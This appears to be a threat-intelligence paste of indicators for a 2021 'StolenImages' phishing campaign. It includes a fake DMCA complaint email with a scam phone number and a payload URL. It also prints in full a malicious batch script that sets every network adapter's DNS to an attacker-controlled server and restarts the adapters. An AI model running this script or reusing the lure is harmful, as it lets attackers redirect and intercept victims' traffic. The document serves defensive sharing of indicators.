API tools faq
paste
ExecuteMalware

2021-08-05 StolenImages Campaign IOCs

ExecuteMalware
Aug 5th, 2021
14,797
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.37 KB | None | 0 0
raw download clone embed print report
  1. THREAT ATTRIBUTION: STOLEN IMAGES / UNKNOWN
  2.  
  3. The Email had an attached .bat file
  4.  
  5. SUBJECTS OBSERVED
  6. Contact your provider's technical support immediately 1 (877) 5471-430 .Copyright infringement complaint
  7.  
  8. SENDERS OBSERVED
  9. [email protected]
  10.  
  11. STOLEN IMAGES PAYLOAD URL
  12. https://fvcalw.de/dirwp.php
  13.  
  14. EMAIL BODY
  15. Technical department for dealing with complaints of copyright holders
  16. 1 (877) 5471-430
  17.  
  18. Contact your provider's technical support immediately
  19.  
  20. We always respond to copyright infringement notices. Content posted from your device violates the US Digital Millennium Copyright Act (DMCA)
  21.  
  22. Call is free for us residents
  23.  
  24. Read the full text of the complaint
  25. About
  26.  
  27. Technical Department
  28.  
  29. Contact Info
  30.  
  31. 203 St. Mountain View, San Francisco, California, USA
  32. 1 (877) 5471-430
  33.  
  34. Useful Links
  35. 1 (877) 5471-430
  36.  
  37. Useful Links
  38. © 2021 Stories. All Rights Reserved
  39.  
  40. Cancel Subscription
  41.  
  42. SUPPORTING EVIDENCE
  43. The attached .bat file contents:
  44. @ECHO OFF
  45.  
  46. SETLOCAL EnableDelayedExpansion
  47.  
  48. :ETHERNET
  49.  
  50. SET adapterName=
  51.  
  52. FOR /F "tokens=* delims=:" %%a IN ('IPCONFIG ^| FIND /I "ETHERNET ADAPTER"') DO (
  53. SET adapterName=%%a
  54.  
  55. REM Removes "Ethernet adapter" from the front of the adapter name
  56. SET adapterName=!adapterName:~17!
  57.  
  58. REM Removes the colon from the end of the adapter name
  59. SET adapterName=!adapterName:~0,-1!
  60.  
  61. rem ECHO !adapterName!
  62.  
  63. netsh interface ipv4 set dns name="!adapterName!" static 45.138.72.52 primary
  64. netsh interface ipv6 set dns name="!adapterName!" static ::1 primary
  65. timeout /t 2
  66. netsh interface set interface "!adapterName!" DISABLED
  67. timeout /t 2
  68. netsh interface set interface "!adapterName!" ENABLED
  69. rem netsh interface ipv4 add dns name="!adapterName!" 192.168.0.3 index=2
  70. )
  71.  
  72. :WIRELESS
  73.  
  74. FOR /F "tokens=* delims=:" %%a IN ('IPCONFIG ^| FIND /I "WIRELESS LAN ADAPTER"') DO (
  75. SET adapterName=%%a
  76.  
  77. REM Removes "Wireless LAN adapter" from the front of the adapter name
  78. SET adapterName=!adapterName:~21!
  79.  
  80. REM Removes the colon from the end of the adapter name
  81. SET adapterName=!adapterName:~0,-1!
  82.  
  83. rem ECHO !adapterName!
  84.  
  85. netsh interface ipv4 set dns name="!adapterName!" static 45.138.72.52 primary
  86. netsh interface ipv6 set dns name="!adapterName!" static ::1 primary
  87. timeout /t 2
  88. netsh interface set interface "!adapterName!" DISABLED
  89. timeout /t 2
  90. netsh interface set interface "!adapterName!" ENABLED
  91. )
  92.  
  93. ipconfig /flushdns
  94.  
  95. :EOF
  96.  
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!